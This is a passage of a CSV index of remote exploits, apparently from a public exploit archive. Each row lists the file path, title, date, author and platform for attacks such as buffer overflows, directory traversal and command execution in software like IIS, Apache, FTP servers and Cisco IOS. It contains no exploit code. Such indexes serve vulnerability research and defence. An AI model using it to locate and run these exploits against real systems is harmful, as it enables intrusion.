+20616,exploits/windows/remote/20616.txt,"soft lite serverworx 3.0 - Directory Traversal",2001-02-07,joetesta,remote,windows, +20617,exploits/unix/remote/20617.c,"SSH 1.2.x - CRC-32 Compensation Attack Detector",2001-02-08,"Michal Zalewski",remote,unix, +20618,exploits/multiple/remote/20618.txt,"IBM Net.Commerce 2.0/3.x/4.x - orderdspc.d2w order_rn Option SQL Injection",2001-02-05,"Rudi Carell",remote,multiple, +20619,exploits/linux/remote/20619.c,"Linuxconf 1.1.6 r10 - Remote Buffer Overflow",1999-12-21,R00T-X,remote,linux, +20620,exploits/sco/remote/20620.c,"SCO UNIX 5 calserver - Remote Buffer Overflow",1998-12-29,"Leshka Zakharoff",remote,sco, +20622,exploits/linux/remote/20622.c,"Xmail 0.5/0.6 CTRLServer - Arbitrary Commands",2001-02-01,isno,remote,linux, +20623,exploits/cgi/remote/20623.txt,"carey internets services commerce.cgi 2.0.1 - Directory Traversal",2001-02-12,slipy,remote,cgi, +20624,exploits/windows/remote/20624.rb,"Adobe Flash Player 11.3 - Font Parsing Code Execution (Metasploit)",2012-08-20,Metasploit,remote,windows, +20625,exploits/multiple/remote/20625.txt,"SilverPlatter WebSPIRS 3.3.1 - File Disclosure",2001-02-12,cuctema,remote,multiple, +20628,exploits/windows/remote/20628.txt,"his software auktion 1.62 - Directory Traversal",2001-02-12,cuctema,remote,windows, +20629,exploits/cgi/remote/20629.txt,"Way-Board 2.0 - File Disclosure",2001-02-12,cuctema,remote,cgi, +20630,exploits/cgi/remote/20630.txt,"Martin Hamilton ROADS 2.3 - File Disclosure",2001-02-12,cuctema,remote,cgi, +20631,exploits/cgi/remote/20631.txt,"PALS Library System WebPALS 1.0 - pals-cgi Traversal Arbitrary File Read",2001-02-02,cuctema,remote,cgi, +20632,exploits/cgi/remote/20632.txt,"PALS Library System WebPALS 1.0 - pals-cgi Arbitrary Command Execution",2001-02-02,cuctema,remote,cgi, +20633,exploits/cgi/remote/20633.txt,"Brightstation Muscat 1.0 - Full Path Disclosure",2001-02-12,cuctema,remote,cgi, +20635,exploits/multiple/remote/20635.txt,"caucho Technology resin 1.2 - Directory Traversal",2001-02-16,joetesta,remote,multiple, +20636,exploits/linux/remote/20636.txt,"thinking arts es.one 1.0 - Directory Traversal",2001-02-16,slipy,remote,linux, +20637,exploits/windows/remote/20637.txt,"itafrica webactive 1.0 - Directory Traversal",2001-02-16,slipy,remote,windows, +20638,exploits/multiple/remote/20638.txt,"Bajie WebServer 0.78/0.90 - Remote Command Execution",2001-02-15,joetesta,remote,multiple, +20639,exploits/multiple/remote/20639.txt,"Bajie 0.78 - Arbitrary Shell Command Execution",2001-02-15,joetesta,remote,multiple, +20640,exploits/windows/remote/20640.txt,"Working Resources BadBlue 1.2.7 - Full Path Disclosure",2001-02-20,"SNS Research",remote,windows, +20642,exploits/cgi/remote/20642.pl,"Adcycle 0.77/0.78 - AdLibrary.pm Session Access",2001-02-19,"Neil K",remote,cgi, +20646,exploits/unix/remote/20646.c,"LICQ 0.85/1.0.1/1.0.2 - Remote Buffer Overflow",2000-12-26,"Stan Bubrouski",remote,unix, +20647,exploits/windows/remote/20647.c,"Atrium Software Mercur Mail Server 3.3 - EXPN Buffer Overflow",2001-02-23,"Martin Rakhmanoff",remote,windows, +20648,exploits/solaris/remote/20648.c,"Solaris 2.6/7.0/8 - snmpXdmid Buffer Overflow",2001-03-15,"Last Stage of Delirium",remote,solaris, +20649,exploits/solaris/remote/20649.pm,"Solaris 2.6/7.0/8 - snmpXdmid Buffer Overflow (Metasploit)",2001-03-15,vlad902,remote,solaris, +20652,exploits/hardware/remote/20652.txt,"Cisco IOS 11.x/12.0 - ILMI SNMP Community String",2001-02-27,pask,remote,hardware, +20653,exploits/windows/remote/20653.txt,"SunFTP 1.0 Build 9 - Unauthorized File Access",2001-03-02,se00020,remote,windows, +20657,exploits/windows/remote/20657.txt,"Robin Twombly A1 HTTP Server 1.0 - Directory Traversal",2001-02-27,slipy,remote,windows, +20660,exploits/unix/remote/20660.txt,"KICQ 1.0 - Arbitrary Command Execution",2001-02-14,"Marc Roessler",remote,unix, +20661,exploits/windows/remote/20661.txt,"jarle aase war ftpd 1.67 b04 - Directory Traversal",2001-03-06,se00020,remote,windows, +20663,exploits/windows/remote/20663.txt,"WhitSoft SlimServe ftpd 1.0/2.0 - Directory Traversal",2001-02-28,joetesta,remote,windows, +20680,exploits/windows/remote/20680.html,"Microsoft Internet Explorer 5.0.1/5.5/6.0 - Telnet Client File Overwrite",2001-03-09,"Oliver Friedrichs",remote,windows, +20683,exploits/cgi/remote/20683.txt,"IkonBoard 2.1.7b - Remote File Disclosure",2001-03-11,"Martin J. Muench",remote,cgi, +20685,exploits/multiple/remote/20685.txt,"IBM Net.Commerce 3.1/3.2 Websphere - Weak Password",2001-03-07,"Rudi Carell",remote,multiple, +20686,exploits/cgi/remote/20686.txt,"Free Online Dictionary of Computing 1.0 - Remote File Viewing",2001-03-09,Cgisecurity,remote,cgi, +20687,exploits/windows/remote/20687.txt,"OReilly Software WebSite Professional 2.5.4 - Path Disclosure",2001-03-16,"Roberto Moreno",remote,windows, +20688,exploits/windows/remote/20688.txt,"Qualcomm Eudora 5.0.2 - 'Use Microsoft Viewer' Code Execution",2001-03-18,http-equiv,remote,windows, +20689,exploits/cgi/remote/20689.pl,"SWSoft ASPSeek 1.0 - 's.cgi' Remote Buffer Overflow",2001-03-19,teleh0r,remote,cgi, +20690,exploits/linux/remote/20690.sh,"WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion",2001-03-15,"Frank DENIS",remote,linux, +20692,exploits/multiple/remote/20692.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing (1)",2001-06-13,rfp,remote,multiple, +20693,exploits/multiple/remote/20693.c,"Apache 1.3 - Artificially Long Slash Path Directory Listing (2)",2002-02-21,st0ic,remote,multiple, +20694,exploits/multiple/remote/20694.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing (3)",2001-06-13,farm9,remote,multiple, +20695,exploits/multiple/remote/20695.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing (4)",2001-06-13,farm9,remote,multiple, +20702,exploits/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow (Metasploit)",2012-08-21,"Matt Andreko",remote,windows, +20714,exploits/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal",2001-03-27,"UkR hacking team",remote,cgi, +20716,exploits/windows/remote/20716.txt,"Apache Tomcat 3.0 - Directory Traversal",2001-03-28,lovehacker,remote,windows, +20717,exploits/windows/remote/20717.txt,"elron im Anti-Virus 3.0.3 - Directory Traversal",2001-03-23,"Erik Tayler",remote,windows, +20719,exploits/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0 / Weblogic Server 5.1 - URL JSP Request Source Code Disclosure",2001-03-28,"Sverre H. Huseby",remote,multiple, +20722,exploits/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 - JavaBean Disclosure",2001-04-03,lovehacker,remote,multiple, +20723,exploits/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 - User Credentials Disclosure",2001-04-03,"Rob Beck",remote,windows, +20725,exploits/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Arbitrary Commands",2001-04-02,"UkR hacking team",remote,cgi, +20726,exploits/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 - File Existence Disclosure",2001-04-03,"Rob Beck",remote,windows, +20727,exploits/linux/remote/20727.c,"NTPd - Remote Buffer Overflow",2001-04-04,"babcia padlina ltd",remote,linux, +20730,exploits/unix/remote/20730.txt,"IPFilter 3.x - Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",remote,unix, +20731,exploits/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Remote Buffer Overflow",2001-04-14,"fish stiqz",remote,bsd, +20732,exploits/freebsd/remote/20732.pl,"FreeBSD 4.2-stable - FTPd 'glob()' Remote Buffer Overflow",2001-04-16,"Elias Levy",remote,freebsd, +20733,exploits/openbsd/remote/20733.c,"OpenBSD 2.x < 2.8 FTPd - 'glob()' Remote Buffer Overflow",2001-04-16,"Elias Levy",remote,openbsd, +20738,exploits/multiple/remote/20738.txt,"PGP 5.x/6.x/7.0 - ASCII Armor Parser Arbitrary File Creation",2001-04-09,"Chris Anley",remote,multiple, +20744,exploits/cgi/remote/20744.pl,"nph-maillist 3.0/3.5 - Arbitrary Code Execution",2001-04-10,Kanedaaa,remote,cgi, +20745,exploits/solaris/remote/20745.txt,"Solaris 2.6/7.0 - IN.FTPD CWD 'Username' Enumeration",2001-04-11,"Johnny Cyberpunk",remote,solaris, +20748,exploits/linux/remote/20748.pl,"cfingerd 1.4 - Format String (1)",2001-04-11,Lez,remote,linux, +20749,exploits/linux/remote/20749.c,"cfingerd 1.4 - Format String (2)",2001-04-16,VeNoMouS,remote,linux, +20752,exploits/cgi/remote/20752.txt,"NCM Content Management System - content.pl Input Validation",2001-04-13,"RA-Soft Security",remote,cgi, +20944,exploits/windows/remote/20944.rb,"SAP NetWeaver HostControl - Command Injection (Metasploit)",2012-08-31,Metasploit,remote,windows, +20758,exploits/windows/remote/20758.c,"Vice City Multiplayer Server 0.3z R2 - Remote Code Execution",2012-08-23,Sasuke78200,remote,windows, +20764,exploits/solaris/remote/20764.txt,"Solaris 2.6 - FTP Core Dump Shadow Password Recovery",2001-04-17,warning3,remote,solaris, +20765,exploits/linux/remote/20765.pl,"Linux Kernel 2.4 - IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion",2001-04-16,"Cristiano Lincoln Mattos",remote,linux, +20774,exploits/windows/remote/20774.txt,"Microsoft Internet Explorer 5.5 - CLSID File Execution",2001-04-17,"Georgi Guninski",remote,windows, +20775,exploits/windows/remote/20775.txt,"Netscape SmartDownload 1.3 - Remote Buffer Overflow",2001-04-13,"Craig Davison",remote,windows, +20780,exploits/cgi/remote/20780.c,"CrossWind CyberScheduler 2.1 - websyncd Remote Buffer Overflow",2001-04-17,"Enrique A.",remote,cgi, +20782,exploits/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 / OE 5.5 - XML Stylesheets Active Scripting",2001-04-20,"Georgi Guninski",remote,windows, +20791,exploits/unix/remote/20791.php,"Netscape Navigator 4.0.8 - 'about:' Domain Information Disclosure",2001-04-09,"Florian Wesch",remote,unix, +20793,exploits/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 - Relative Path Webroot Escaping",2001-04-23,joetesta,remote,windows, +20794,exploits/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' / 'CWD' Remote Buffer Overflow",2001-04-22,"Len Budney",remote,windows, +20796,exploits/linux/remote/20796.rb,"Zabbix Server - Arbitrary Command Execution (Metasploit)",2012-08-27,Metasploit,remote,linux, +20797,exploits/multiple/remote/20797.txt,"Perl Web Server 0.x - Directory Traversal",2001-04-24,neme-dhc,remote,multiple, +20799,exploits/cgi/remote/20799.c,"PowerScripts PlusMail WebConsole 1.0 - Weak Authentication (1)",2000-01-11,"Synnergy Networks",remote,cgi, +20800,exploits/cgi/remote/20800.c,"PowerScripts PlusMail WebConsole 1.0 - Weak Authentication (2)",2000-01-11,missnglnk,remote,cgi, +20801,exploits/cgi/remote/20801.c,"PowerScripts PlusMail WebConsole 1.0 - Weak Authentication (3)",2000-01-20,ytcracker,remote,cgi, +20803,exploits/windows/remote/20803.txt,"RaidenFTPd 2.1 - Directory Traversal",2001-04-25,joetesta,remote,windows, +20805,exploits/irix/remote/20805.c,"SGI IRIX 3/4/5/6 / OpenLinux 1.0/1.1 - routed traceon",1998-10-21,Rootshell,remote,irix, +20806,exploits/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 - Network Printer Administration Interface",2001-04-25,Ltlw0lf,remote,hardware, +20807,exploits/multiple/remote/20807.txt,"datawizard webxq 2.1.204 - Directory Traversal",2001-04-27,joetesta,remote,multiple, +20808,exploits/cgi/remote/20808.txt,"PerlCal 2.x - Directory Traversal",2001-04-27,ThePike,remote,cgi, +20809,exploits/cgi/remote/20809.html,"Excite for Web Servers 1.1 - Administrative Password",1998-11-30,"Michael Gerdts",remote,cgi, +20815,exploits/windows/remote/20815.pl,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (1)",2001-05-01,storm,remote,windows, +20816,exploits/windows/remote/20816.c,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (2)",2001-05-01,"dark spyrit",remote,windows, +20817,exploits/windows/remote/20817.c,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (3)",2005-02-02,styx,remote,windows, +20818,exploits/windows/remote/20818.txt,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (4)",2001-05-01,"Cyrus The Great",remote,windows, +20819,exploits/windows/remote/20819.txt,"BRS Webweaver 0.x - FTP Root Full Path Disclosure",2001-04-28,joetesta,remote,windows, +20820,exploits/windows/remote/20820.c,"NullSoft Winamp 2.x - AIP Buffer Overflow",2001-04-29,byterage,remote,windows, +20825,exploits/windows/remote/20825.txt,"Michael Lamont Savant HTTP Server 2.1 - Directory Traversal",2001-02-17,"Tom Tom",remote,windows, +20826,exploits/windows/remote/20826.txt,"Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal",2001-05-07,neme-dhc,remote,windows, +20829,exploits/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 - Hex Encoded Directory Traversal",2001-05-07,neme-dhc,remote,windows, +20831,exploits/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 - 'a1disp2.cgi' Traversal Arbitrary File Read",2001-05-07,neme-dhc,remote,cgi, +20832,exploits/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 - 'a1disp3.cgi' Traversal Arbitrary File Read",2001-05-07,neme-dhc,remote,cgi, +20833,exploits/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 - 'a1disp4.cgi' Traversal Arbitrary File Read",2001-05-07,neme-dhc,remote,cgi, +20835,exploits/windows/remote/20835.c,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (1)",2001-05-15,"Filip Maertens",remote,windows, +20836,exploits/windows/remote/20836.c,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (2)",2001-05-16,HuXfLuX,remote,windows, +20837,exploits/windows/remote/20837.pl,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (3)",2001-05-15,"Cyrus The Gerat",remote,windows, +20838,exploits/windows/remote/20838.c,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (4)",2001-05-15,MovAX,remote,windows, +20839,exploits/windows/remote/20839.sh,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (5)",2001-05-15,"Leif Jakob",remote,windows, +20840,exploits/windows/remote/20840.txt,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (6)",2001-05-15,A.Ramos,remote,windows, +20841,exploits/windows/remote/20841.txt,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (7)",2001-05-15,"Gary O'Leary-Steele",remote,windows, +20842,exploits/windows/remote/20842.txt,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (8)",2001-05-15,Roelof,remote,windows, +20849,exploits/cgi/remote/20849.pl,"DCForum 6.0 - Remote Admin Privilege Arbitrary Commands",2001-05-08,"Franklin DeMatto",remote,cgi, +20850,exploits/windows/remote/20850.txt,"Pacific Software Carello 1.2.1 Shopping Cart - Command Execution",2001-05-14,"Peter Gründl",remote,windows, +20865,exploits/java/remote/20865.rb,"Java 7 Applet - Remote Code Execution (Metasploit)",2012-08-27,Metasploit,remote,java, +20869,exploits/multiple/remote/20869.html,"eSafe Gateway 2.1 - Script-filtering Bypass",2001-05-20,"eDvice Security Services",remote,multiple, +20876,exploits/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 - ASLR Bypass",2012-08-28,pole,remote,windows, +20878,exploits/cgi/remote/20878.txt,"mimanet source viewer 2.0 - Directory Traversal",2001-05-23,joetesta,remote,cgi, +20879,exploits/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6 / HP-UX 10/11 / Solaris 2.6/7.0/8 - rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,remote,unix, +20881,exploits/multiple/remote/20881.txt,"Beck IPC GmbH IPC@CHIP - TelnetD Login Account Brute Force",2001-05-24,"Courtesy Sentry Research Labs",remote,multiple, +20882,exploits/multiple/remote/20882.txt,"faust Informatics FreeStyle chat 4.1 sr2 - Directory Traversal",2001-05-25,nemesystm,remote,multiple, +20884,exploits/windows/remote/20884.txt,"ACLogic CesarFTP 0.98b - Directory Traversal",2001-05-27,byterage,remote,windows, +20886,exploits/windows/remote/20886.txt,"Omnicron OmniHTTPd 2.0.4-8 - File Source Disclosure",2001-05-26,astral,remote,windows, +20887,exploits/cgi/remote/20887.txt,"Cosmicperl Directory Pro 2.0 - Arbitrary File Disclosure",2001-05-28,Marshal,remote,cgi, +20888,exploits/windows/remote/20888.txt,"Qualcomm Eudora 5.1 - Hidden Attachment Execution",2001-05-29,http-equiv,remote,windows, +20889,exploits/multiple/remote/20889.txt,"GNU Privacy Guard 1.0.x - Format String",2001-05-29,"fish stiqz",remote,multiple, +20890,exploits/multiple/remote/20890.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 - HTML tag Script-filtering Bypass",2001-05-29,"eDvice Security Services",remote,multiple, +20891,exploits/multiple/remote/20891.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 - Unicode Script-filtering Bypass",2001-05-29,"eDvice Security Services",remote,multiple, +20892,exploits/hardware/remote/20892.txt,"Olicom XLT-F XL 80 IM V5.5BL2 - Undocumented Community String",2001-03-25,"Jacek Lipkowski",remote,hardware, +20893,exploits/windows/remote/20893.txt,"Trend Micro Interscan VirusWall for Windows NT 3.4/3.5/3.51 - Remote Reconfiguration",2001-05-24,snsadv,remote,windows, +20894,exploits/multiple/remote/20894.txt,"Acme.Serve 1.7 - Arbitrary File Access",2001-05-31,"Adnan Rahman",remote,multiple, +20895,exploits/cgi/remote/20895.txt,"WebTrends Enterprise Reporting Server 3.1 c/3.5 - Source Code Disclosure",2001-06-03,"Auriemma Luigi",remote,cgi, +20896,exploits/windows/remote/20896.txt,"OReilly Software WebBoard 4.10.30 - Pager Hostile JavaScript",2001-06-02,"Helmuth Antholzer",remote,windows, +20899,exploits/windows/remote/20899.txt,"Microsoft Outlook 97/98/2000/4/5 - Address Book Spoofing",2001-06-05,3APA3A,remote,windows, +20902,exploits/linux/remote/20902.c,"PKCrew TIAtunnel 0.9 alpha2 - Authentication Mechanism Buffer Overflow",2001-06-05,qitest1,remote,linux, +20903,exploits/windows/remote/20903.html,"Microsoft Internet Explorer 5.5 - File Disclosure",2001-03-31,"Georgi Guninski",remote,windows, +20908,exploits/linux/remote/20908.c,"Xinetd 2.1.8 - Remote Buffer Overflow",2001-06-28,qitest1,remote,linux, +20909,exploits/multiple/remote/20909.txt,"IBM Tivoli NetView 5/6 - OVActionD SNMPNotify Command Execution",2001-06-08,"Milo van der Zee",remote,multiple, +20910,exploits/windows/remote/20910.pl,"TransSoft Broker FTP Server 3.0/4.0/4.7/5.x - CWD Buffer Overflow",2001-06-10,byterage,remote,windows, +20911,exploits/osx/remote/20911.txt,"Apache 1.3.14 - Mac File Protection Bypass",2001-06-10,"Stefan Arentz",remote,osx, +20912,exploits/windows/remote/20912.txt,"Trend Micro Interscan VirusWall for Windows NT 3.51 - Configurations Modification",2001-06-12,"SNS Advisory",remote,windows, +20914,exploits/cgi/remote/20914.pl,"cgiCentral WebStore 400 - Administrator Authentication Bypass",2001-05-06,"Igor Dobrovitski",remote,cgi, +20916,exploits/cgi/remote/20916.pl,"cgiCentral WebStore 400 - Arbitrary Command Execution",2001-05-06,"Igor Dobrovitski",remote,cgi, +20924,exploits/linux/remote/20924.txt,"MDBms 0.96/0.99 - Query Display Buffer Overflow",2001-06-12,teleh0r,remote,linux, +20929,exploits/linux/remote/20929.c,"ghttpd 1.4 - Daemon Buffer Overflow",2001-06-17,qitest1,remote,linux, +20931,exploits/windows/remote/20931.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (2)",2001-06-21,hsj,remote,windows, +20932,exploits/windows/remote/20932.sh,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (3)",2001-06-18,mat,remote,windows, +20933,exploits/windows/remote/20933.pl,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (4)",2001-06-18,blackangels,remote,windows, +20934,exploits/windows/remote/20934.txt,"Internet Software Solutions Air Messenger LAN Server 3.4.2 - Full Path Disclosure",2001-06-18,"SNS Research",remote,windows, +20935,exploits/cgi/remote/20935.pl,"Microburst uDirectory 2.0 - Remote Command Execution",2001-06-18,"Igor Dobrovitski",remote,cgi, +20936,exploits/linux/remote/20936.c,"NetSQL 1.0 - Remote Buffer Overflow",2001-06-15,"Sergio Monteiro",remote,linux, +20938,exploits/cgi/remote/20938.txt,"DC Scripts DCShop Beta 1.0 02 - File Disclosure (1)",2001-06-18,"Peter Helms",remote,cgi, +20939,exploits/cgi/remote/20939.txt,"DC Scripts DCShop Beta 1.0 02 - File Disclosure (2)",2001-06-18,"Peter Helms",remote,cgi, +20940,exploits/cgi/remote/20940.txt,"Tarantella Enterprise 3 3.x - 'TTAWebTop.cgi' Arbitrary File Viewing",2001-06-18,kf,remote,cgi, +20941,exploits/freebsd/remote/20941.pl,"W3M 0.1/0.2 - Malformed MIME Header Buffer Overflow",2001-06-19,White_E,remote,freebsd, +20947,exploits/windows/remote/20947.txt,"1C: Arcadia Internet Store 1.0 - Arbitrary File Disclosure",2001-06-21,ViperSV,remote,windows, +20948,exploits/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 - Path Disclosure",2001-06-21,ViperSV,remote,windows, +20950,exploits/windows/remote/20950.c,"Microsoft Visual Studio RAD Support - Remote Buffer Overflow",2001-06-21,"NSFOCUS Security Team",remote,windows, +20951,exploits/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support - Remote Buffer Overflow (MS03-051) (Metasploit)",2001-06-21,"NSFOCUS Security Team",remote,windows, +20953,exploits/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String (2)",2001-06-21,mu-b,remote,linux, +20954,exploits/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String (3)",2006-10-06,mu-b,remote,linux, +21017,exploits/linux/remote/21017.txt,"Squid Web Proxy 2.3 - Reverse Proxy",2001-07-18,"Paul Nasrat",remote,linux, +21018,exploits/unix/remote/21018.c,"Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - 'TelnetD' Remote Buffer Overflow",2001-07-18,Dvorak,remote,unix, +20966,exploits/solaris/remote/20966.c,"Netscape PublishingXPert 2.0/2.2/2.5 - Local File Reading",2000-04-06,"\x00\x00",remote,solaris, +20968,exploits/unix/remote/20968.txt,"Samba 2.0.x/2.2 - Arbitrary File Creation",2001-06-23,"Michal Zalewski",remote,unix, +20972,exploits/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal",2001-06-26,gollum,remote,multiple, +20975,exploits/hardware/remote/20975.pl,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (1)",2001-06-27,cronos,remote,hardware, +20976,exploits/hardware/remote/20976.c,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (2)",2001-06-27,"Eliel C. Sardanons",remote,hardware, +20977,exploits/hardware/remote/20977.pl,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (3)",2001-03-07,hypoclear,remote,hardware, +20978,exploits/hardware/remote/20978.pl,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (4)",2001-06-27,blackangels,remote,hardware, +20980,exploits/windows/remote/20980.c,"Oracle 8i - TNS Listener Buffer Overflow",2001-07-20,benjurry,remote,windows, +20982,exploits/cgi/remote/20982.pl,"Active Classifieds 1.0 - Arbitrary Code Execution",2001-06-28,"Igor Dobrovitski",remote,cgi, +20984,exploits/osx/remote/20984.txt,"Apple Mac OSX 10 - nidump Password File Disclosure",2001-06-26,"Steven Kreuzer",remote,osx, +20993,exploits/unix/remote/20993.c,"XFree86 X11R6 3.3 XDM - Session Cookie Guessing",2001-06-24,"ntf & sky",remote,unix, +20994,exploits/linux/remote/20994.txt,"Cobalt Raq3 PopRelayD - Arbitrary SMTP Relay",2001-07-04,"Andrea Barisani",remote,linux, +20998,exploits/linux/remote/20998.c,"xloadimage 4.1 - Remote Buffer Overflow",2001-07-10,"zenith parsec",remote,linux, +21002,exploits/multiple/remote/21002.txt,"Apache 1.3 - Directory Index Disclosure",2001-07-10,Kevin,remote,multiple, +21003,exploits/windows/remote/21003.txt,"Microsoft Outlook 98/2000/2002 - Unauthorized Email Access",2001-07-12,"Georgi Guninski",remote,windows, +21004,exploits/windows/remote/21004.txt,"Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution",2001-07-12,"Georgi Guninski",remote,windows, +21008,exploits/cgi/remote/21008.txt,"Interactive story 1.3 - Directory Traversal",2001-07-15,qDefense,remote,cgi, +21009,exploits/windows/remote/21009.c,"ArGoSoft FTP Server 1.2.2.2 - Weak Password Encryption",2001-07-12,byterage,remote,windows, +21011,exploits/hardware/remote/21011.pl,"3Com SuperStack II PS Hub 40 - TelnetD Weak Password Protection",2001-07-12,Siberian,remote,hardware, +21015,exploits/hardware/remote/21015.pl,"Check Point Firewall-1 4 Securemote - Network Information Leak",2001-07-17,"Haroon Meer & Roelof Temmingh",remote,hardware, +21019,exploits/linux/remote/21019.txt,"Horde 1.2.x/2.1.3 and Imp 2.2.x/3.1.2 - File Disclosure",2001-07-13,"Caldera Open Linux",remote,linux, +21021,exploits/unix/remote/21021.pl,"SSH2 3.0 - Short Password Login",2001-07-21,hypoclear,remote,unix, +21023,exploits/cgi/remote/21023.txt,"CGIWrap 2.x/3.x - Cross-Site Scripting",2001-07-22,"TAKAGI Hiromitsu",remote,cgi, +21025,exploits/multiple/remote/21025.txt,"Proxomitron Naoko-4 - Cross-Site Scripting",2001-07-24,"TAKAGI Hiromitsu",remote,multiple, +21026,exploits/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 - 'pagecount' File Overwrite",2001-07-22,kyprizel,remote,multiple, +21027,exploits/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 - Insecure Default Password Protection",2001-07-25,3APA3A,remote,multiple, +21029,exploits/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",remote,multiple, +21030,exploits/windows/remote/21030.txt,"SnapStream Personal Video Station 1.2 a - PVS Directory Traversal",2001-07-26,john@interrorem.com,remote,windows, +21034,exploits/windows/remote/21034.rb,"SAP NetWeaver Dispatcher - DiagTraceR3Info Buffer Overflow (Metasploit)",2012-09-07,Metasploit,remote,windows,3200 +21035,exploits/windows/remote/21035.txt,"SnapStream PVS 1.2 - Plaintext Password",2001-07-26,John,remote,windows, +21036,exploits/windows/remote/21036.pl,"Ipswitch WS_FTP Server 2.0 - Anonymous Multiple FTP Command Buffer Overflows",2001-07-25,andreas,remote,windows, +21037,exploits/linux/remote/21037.c,"GNU groff 1.1x - xploitation Via LPD",2001-06-23,zen-parse,remote,linux, +21039,exploits/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 - Hex Encoded URL Directory Traversal",2001-07-26,THRAN,remote,windows, +21049,exploits/linux/remote/21049.c,"NCSA HTTPd 1.x - Remote Buffer Overflow (1)",1997-04-23,savage,remote,linux, +21050,exploits/linux/remote/21050.c,"NCSA HTTPd 1.x - Remote Buffer Overflow (2)",1995-02-17,Xtremist,remote,linux, +21057,exploits/windows/remote/21057.txt,"Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure",2001-08-08,"Marek Roy",remote,windows, +21064,exploits/unix/remote/21064.c,"Fetchmail 5.x - POP3 Reply Signed Integer Index",2001-08-09,"Salvatore Sanfilippo -antirez-",remote,unix, +21066,exploits/unix/remote/21066.c,"Fetchmail 5.x - IMAP Reply Signed Integer Index",2001-08-09,"Sanfillipo antirez",remote,unix, +21067,exploits/multiple/remote/21067.c,"Apache 1.0/1.2/1.3 - Server Address Disclosure",2001-08-21,magnum,remote,multiple, +21068,exploits/cgi/remote/21068.txt,"SIX-webboard 2.01 - File Retrieval",2001-08-31,"Hannibal Lector",remote,cgi, +21075,exploits/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb - Arbitrary Command Execution",2001-08-02,"Maurycy Prodeus",remote,linux, +21080,exploits/multiple/remote/21080.rb,"JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit)",2012-09-05,Metasploit,remote,multiple, +21088,exploits/unix/remote/21088.pl,"AOLServer 3 - 'Authentication String' Remote Buffer Overflow (1)",2001-08-22,"Nate Haggard",remote,unix, +21089,exploits/unix/remote/21089.c,"AOLServer 3 - 'Authentication String' Remote Buffer Overflow (2)",2001-09-05,qitest1,remote,unix, +21093,exploits/aix/remote/21093.c,"AIX 4.1/4.2 - 'pdnsd' Remote Buffer Overflow",1999-08-17,"Last Stage of 